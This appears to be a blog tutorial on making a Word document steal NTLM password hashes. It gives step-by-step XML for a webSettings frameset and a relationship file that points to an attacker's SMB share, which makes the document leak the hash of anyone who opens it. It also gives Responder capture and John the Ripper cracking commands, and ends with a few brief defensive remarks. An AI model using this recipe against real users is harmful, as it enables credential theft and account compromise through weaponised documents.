Office or Web Page to Steal NTLM Passwords Hashes

We've covered stealing NTLM password hashes here by allowing Windows to broadcast when connecting to a non-existent share or name resolution of WPAD. Preventing LLMNR in GPO and creating a WPAD DNS record prevents this attack with Responder.  

Its easy to prevent the broadcasting of credentials, direct harvesting is a little more difficult to overcome. In this example Word 2019 will be used. PDF, RFT, Excel, Powerpoint, Websites can all be leveraged to steal NTLM hashes.

Create a new Word document and add some content to create meta data. 

You will need 7-Zip or Winrar to 'Open with'.

CD to 'Word'.

Copy WebSettings.xml to the Desktop.

Open WebSettings.xml with Notepad and enable 'Word Wrap'.

In between 'w16e w16cid' and '<w:optimize...' paste the following.

<w:frameset>

<w:framesetSplitbar>

<w:w w:val="60"/>

<w:color w:val="auto"/>

<w:noBorder/>

</w:framesetSplitbar>

<w:frameset>

<w:frame>

<w:name w:val="3"/>

<w:sourceFileName r:id="rId1"/>

<w:linkedToFile/>

</w:frame>

</w:frameset>

</w:frameset>

So it looks like this:

Create a new file named 'webSettings.xml.rels'.

Paste the following, update the IP to that of Kali.

 

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>

<Relationships

xmlns="http://schemas.openxmlformats.org/package/2006/relationships">

<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame" Target="\\10.1.1.100\Office Add-ins" TargetMode="External"/>

</Relationships>

Copy 'webSettings.xml' from the Desktop and replace the original version within WinRar.

CD '_rels'

Copy 'webSettings.xml.rels' into the folder.

Close WinRar.

Prior to distributinh, logon to Kali, open a Terminal Windows and type 'responder -I eth0 -wFv'

To test, open the Word document.

The giveaway is that Word is clearly trying to contact the Share.

 

Note. If Kali is not available then Word hangs whilst waiting for Kali to respond.  

The User tries to authenticate to a non-existent share and their password hash is passed to Responder.

Responder logs all its activity, browse or cd ​/usr/share/responder/logs

The wordlist as stored at /usr/share/wordlists and 'rockyou.txt' is the wordlist of choice today.

Run the following 'John' command.

john /usr/share/responder/SMB-NTLMv2-SSP-10.1.1.107.txt --wordlist:/usr/share/wordlists/rockyou.txt

If your lucky and user has a known simple password it will be cracked in no time. There are alternatives to rockyou and far newer and much larger wordlists are available via a Google search.

The same can be achieved with connecting to a Website, despite the WPAD DNS Record being in place. Its just a mater of tricking the user in connecting.

Now this is going to be a challenge as this is standard behavior for Windows when connecting to a Share or Website. AV, Applocker and in many cases Firewall wont prevent these types of attacks especially port 80 and 443 traffic. The edge firewalls shouldn't allow outbound SMB traffic on 445 and the clients firewalls should name the IP's for any internal SMB Shares. As for web traffic I'm not sure there is a fix.